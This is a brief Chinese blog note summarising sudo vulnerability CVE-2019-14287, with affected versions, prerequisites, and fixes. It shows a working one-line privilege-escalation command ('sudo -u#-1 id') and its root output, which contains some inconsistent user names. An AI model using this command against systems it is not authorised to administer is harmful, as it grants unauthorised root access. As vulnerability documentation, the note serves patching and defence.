应用安全 - 软件漏洞 - sudo漏洞汇总

sudo Potential bypass of Runas user restrictions(CVE-2019-14287 )

Date:
2019.10.14

类型：

sudo提权漏洞

影响版本：
sudo < 1.8.28

前提：
知道当前用户的密码
当前用户存在于sudo权限列表

root@root-Pc:~$ id
uid=1000(root) gid=1000(root) 组=1000(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
root@root-Pc:~$ sudo -u#-1 id
[sudo] root 的密码： 
uid=0(root) gid=1000(mark) 组=1000(mark)

修复：
升级sudo版本
修改sudo用户列表

posted @ 2019-10-16 16:44 7hang 阅读(209) 评论(0) 编辑收藏举报

刷新页面返回顶部

7hang.

网络安全爱好者，blog is just for notes.

应用安全 - 软件漏洞 - sudo漏洞汇总

公告